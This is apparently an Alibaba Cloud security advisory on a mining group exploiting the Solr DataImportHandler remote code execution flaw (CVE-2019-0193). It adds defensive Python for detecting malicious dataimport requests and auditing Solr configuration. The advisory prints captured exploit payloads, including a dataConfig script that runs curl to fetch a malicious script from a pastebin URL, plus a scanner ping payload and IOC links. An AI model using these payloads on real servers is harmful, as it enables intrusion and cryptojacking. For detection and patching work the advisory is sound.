
Solr Dataimport Vulnerability Becomes a New Attack Method for Mining Organizations

The Alibaba Cloud security team has detected a new attack method that uses the Solr dataimport RCE vulnerability (CVE-2019-0193) to implant mining programs on target hosts.

Summary

Recently, the Alibaba Cloud security team detected a mining group using the Solr dataimport RCE vulnerability (CVE-2019-0193) as a new attack method to implant a mining program on target hosts. The malicious script used by the group is essentially the same as the one analysed in the previously reported article [1], so this attack can be attributed to the same group.

It is therefore reasonable to assume that this group is actively looking for new attack vectors. The Alibaba Cloud security team detected this activity at an early stage and continues to monitor the group's behavior.

The Alibaba Cloud security team recommends that users promptly check whether their hosts are affected and follow the related articles.

Vulnerability Details

Apache Solr is the popular, blazing fast open source enterprise search platform from the Apache Lucene project. Its major features include powerful full-text search, hit highlighting, faceted search, dynamic clustering, database integration, rich document handling, and geospatial search.

Remote Code Execution via DataImportHandler (CVE-2019-0193) is a vulnerability advisory published by Apache Solr on 2019.8.1. The vulnerability lies in Solr's DataImportHandler (DIH) module, which retrieves data from a database or another data source. Because the Solr admin interface requires no authentication by default and DIH supports script transformers, a crafted HTTP request can achieve remote command execution.

As shown below, select the dataimport tab in the Solr admin UI. Because the dataimport configuration supports scripts, a malicious script can be placed in the configuration and made to execute a command such as curl xxx.xxx.xxx.xx.

[Figure: Solr dataimport tab]

As shown in the figure below, our server received the HTTP request sent by Solr, confirming that the RCE succeeded.

[Figure: RCE result]

Exploit Analysis

The Alibaba Cloud security team recently detected attackers attempting to exploit this vulnerability to compromise hosts on Alibaba Cloud. The attacker first sends a request such as http://xx.xx.xx.xx:8983/solr/admin/cores?action=STATUS&wt=json to obtain the names of all cores in Solr.

[Figure: core names returned by the STATUS request]

The attacker then iterates over these core names and attempts to send the following payload to corename/dataimport, which fetches a malicious script from https://pastebin.com/raw/jjFzjCwx.

command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=<dataConfig>
+<dataSource+type="URLDataSource" />
+<script><![CDATA[
+++++++++function+poc(){+java.lang.Runtime.getRuntime().exec("curl+-fsSL+https://pastebin.com/raw/jjFzjCwx+-o+/tmp/baby");
+++++++++}
+]]></script>
+<document>
+++<entity+name="stackoverflow"
+++++++++++url="https://stackoverflow.com/feeds/tag/solr"
+++++++++++processor="XPathEntityProcessor"
+++++++++++forEach="/feed"
+++++++++++transformer="script:poc"+/>
+</document>
</dataConfig>&name=dataimport

Following the malicious script at https://pastebin.com/raw/jjFzjCwx, we found that it differs in only one place from the Watchbog mining program analysed previously, and that difference is not significant; for the remainder of the script, refer to the previous article.

[Figure: file diff against the previously analysed script]

In addition, we observed requests that execute a ping command against an external domain, apparently scanner traffic used to identify vulnerable hosts:

command=full-import&verbose=false&clean=false&commit=true&debug=true&core=solr&dataConfig=<dataConfig>
  <dataSource type="URLDataSource"/>
  <script>
    <![CDATA[
    function poc(row) {
      var Runtime = Java.type("java.lang.Runtime");
      Runtime.getRuntime().exec("ping -c 1 solr_CVE_2019_0193XfSIcGVY.awvsscan119.autoverify.cn");
      return row;
    }
    ]]></script>
 </dataConfig>
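Both captured payloads share the same shape: a POST to a core's /dataimport handler whose dataConfig parameter carries an inline script that calls java.lang.Runtime. The following added example (not from the original post) shows how a defender can flag such requests in captured HTTP traffic. It URL-decodes the form body (the '+' padding in the first payload is form encoding for spaces), extracts dataConfig and looks for a script element and JVM command-execution markers. The sample requests are constructed for this example, with placeholders instead of a real callback host or command; the ProcessBuilder marker is an assumption added beyond what the post shows.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Only requests to <core>/dataimport reach the DataImportHandler.
DATAIMPORT_PATH = re.compile(r"^/solr/(?P<core>[^/?]+)/dataimport(?:\?|$)")
SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)
# Fragments that appear when a DIH script transformer is used to run OS commands.
# Both payloads in the post use java.lang.Runtime; ProcessBuilder is assumed
# here as the other common JVM route.
EXEC_MARKERS = ("java.lang.Runtime", "Java.type(", ".exec(", "ProcessBuilder")

# Constructed sample traffic (not captured data). The first body mirrors the
# structure of the post's payload with the command replaced by a placeholder.
SAMPLE_REQUESTS = [
    {
        "method": "POST",
        "path": "/solr/test/dataimport",
        "body": "command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test"
                '&dataConfig=<dataConfig>+<dataSource+type="URLDataSource"+/>+<script><![CDATA['
                '+function+poc(){+java.lang.Runtime.getRuntime().exec("COMMAND_PLACEHOLDER");+}'
                "+]]></script>+<document/></dataConfig>&name=dataimport",
    },
    {"method": "GET", "path": "/solr/solr/dataimport?command=status"},
    {"method": "POST", "path": "/solr/test/select", "body": "q=*:*"},
    {
        "method": "POST",
        "path": "/solr/core1/dataimport",
        "body": 'command=full-import&dataConfig=<dataConfig><dataSource+type="JdbcDataSource"/></dataConfig>',
    },
]


def analyze_request(method, path, body=""):
    """Return a finding dict for a suspicious DIH request, or None if it looks benign."""
    match = DATAIMPORT_PATH.match(path)
    if not match:
        return None
    params = parse_qs(urlsplit(path).query, keep_blank_values=True)
    if body:
        # Form bodies encode spaces as '+'; parse_qs undoes that, which turns the
        # '+'-padded payload seen in the post back into readable script text.
        for key, values in parse_qs(body, keep_blank_values=True).items():
            params.setdefault(key, []).extend(values)
    data_config = "".join(params.get("dataConfig", []))
    if not data_config:
        return None
    finding = {
        "method": method,
        "core": match.group("core"),
        "command": params.get("command", [""])[0],
        "indicators": [],
    }
    if SCRIPT_TAG.search(data_config):
        finding["indicators"].append("inline <script> in dataConfig")
    finding["indicators"] += [f"script marker {m!r}" for m in EXEC_MARKERS if m in data_config]
    if finding["indicators"]:
        finding["severity"] = "high"
    else:
        # A request-supplied dataConfig is unusual in production even without a
        # script, so report it at lower severity for baselining.
        finding["severity"] = "medium"
        finding["indicators"].append("dataConfig supplied in request")
    return finding


def scan(requests):
    """Run analyze_request over request dicts and keep only the findings."""
    results = []
    for req in requests:
        finding = analyze_request(req["method"], req["path"], req.get("body", ""))
        if finding:
            results.append(finding)
    return results


if __name__ == "__main__":
    for finding in scan(SAMPLE_REQUESTS):
        print(finding["severity"], finding["core"], finding["command"], finding["indicators"])
```

The decoding step matters: matching the raw body for "java.lang.Runtime" works for the first payload, but a scanner can split tokens with percent-encoding, so decode first and inspect the dataConfig value as the handler itself would see it.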

Vulnerability Influence

At present, about 19k devices across the Internet are running Solr components. The Alibaba Cloud security team recommends that users check the status of their machines promptly to prevent the attack from spreading further.

[Figure: distribution of Solr instances]

IOC

  1. https://pastebin.com/raw/jjFzjCwx
  2. https://pastebin.com/raw/3FDDiNwW
  3. https://pastebin.com/raw/KJcZ9HLL

Vulnerable Versions

  1. Solr versions before 8.2.0 (8.2.0 itself is not affected)
  2. The DataImportHandler module is enabled
  3. Solr authentication is not enabled, or a weak password is used

Security Recommendations

  1. Upgrade Solr to 8.2.0 or later (from 8.2.0 onward, the dataConfig request parameter is disabled by default).
  2. Empty the contents of the config tag under the DataImportHandler requestHandler in solrconfig.xml.
  3. Apply whitelist filtering to DIH-related requests.
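The Vulnerable Versions list and recommendation 2 above can be turned into a self-check for one's own Solr hosts. The following is an added example, not code from the original post: it compares the reported Solr version against 8.2.0, parses a core's solrconfig.xml for DataImportHandler definitions and whether their config element has been emptied, and combines that with whether authentication is configured. The two solrconfig.xml fragments are constructed for this example; the version string, config text and auth flag would in practice come from the host being audited.

```python
import re
import xml.etree.ElementTree as ET

FIXED_VERSION = (8, 2, 0)  # per the post: releases before 8.2.0 are affected

# Constructed sample: a typical DIH handler definition still pointing at a data config.
WEAK_SOLRCONFIG = """
<config>
  <requestHandler name="/select" class="solr.SearchHandler"/>
  <requestHandler name="/dataimport" class="solr.DataImportHandler">
    <lst name="defaults">
      <str name="config">data-config.xml</str>
    </lst>
  </requestHandler>
</config>
"""

# Constructed sample with recommendation 2 applied: the config element is emptied.
HARDENED_SOLRCONFIG = """
<config>
  <requestHandler name="/select" class="solr.SearchHandler"/>
  <requestHandler name="/dataimport" class="solr.DataImportHandler">
    <lst name="defaults">
      <str name="config"></str>
    </lst>
  </requestHandler>
</config>
"""


def parse_version(text):
    """Turn '8.1.1' (or '8.1.1-SNAPSHOT') into a comparable (major, minor, patch) tuple."""
    nums = [int(n) for n in re.findall(r"\d+", text)[:3]]
    return tuple(nums + [0] * (3 - len(nums)))


def dih_handlers(solrconfig_xml):
    """List (handler name, config value) for each DataImportHandler in solrconfig.xml."""
    root = ET.fromstring(solrconfig_xml.strip())
    handlers = []
    for handler in root.iter("requestHandler"):
        if handler.get("class") != "solr.DataImportHandler":
            continue
        config = ""
        for entry in handler.iter("str"):
            if entry.get("name") == "config":
                config = (entry.text or "").strip()
        handlers.append((handler.get("name"), config))
    return handlers


def audit(version, solrconfig_xml, auth_enabled):
    """Evaluate the three exposure conditions from the post plus recommendation 2."""
    findings = []
    old = parse_version(version) < FIXED_VERSION
    if old:
        findings.append(f"Solr {version} is older than 8.2.0")
    handlers = dih_handlers(solrconfig_xml)
    if handlers:
        findings.append("DataImportHandler enabled: " + ", ".join(name for name, _ in handlers))
    for name, config in handlers:
        if config:
            findings.append(f"{name} still references data config {config!r}")
    if not auth_enabled:
        findings.append("no authentication configured for Solr")
    # All three listed conditions must hold for the host to match the post's profile.
    return {"exposed": old and bool(handlers) and not auth_enabled, "findings": findings}


if __name__ == "__main__":
    for label, args in (("weak", ("8.1.1", WEAK_SOLRCONFIG, False)),
                        ("hardened", ("8.2.0", HARDENED_SOLRCONFIG, True))):
        print(label, audit(*args))
```

The version comparison uses tuples rather than string comparison so that 8.10.0 sorts after 8.2.0; the DIH check reports an enabled handler even on a patched host, since an unused import handler is still attack surface worth removing.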

Reference Articles

  1. Warning|Watchbog mining worm upgrade, using multiple vulnerabilities such as Bluekeep RDP to gain momentum
  2. CVE-2019-0193 Remote Code Execution via DataImportHandler
Alibaba Cloud Security
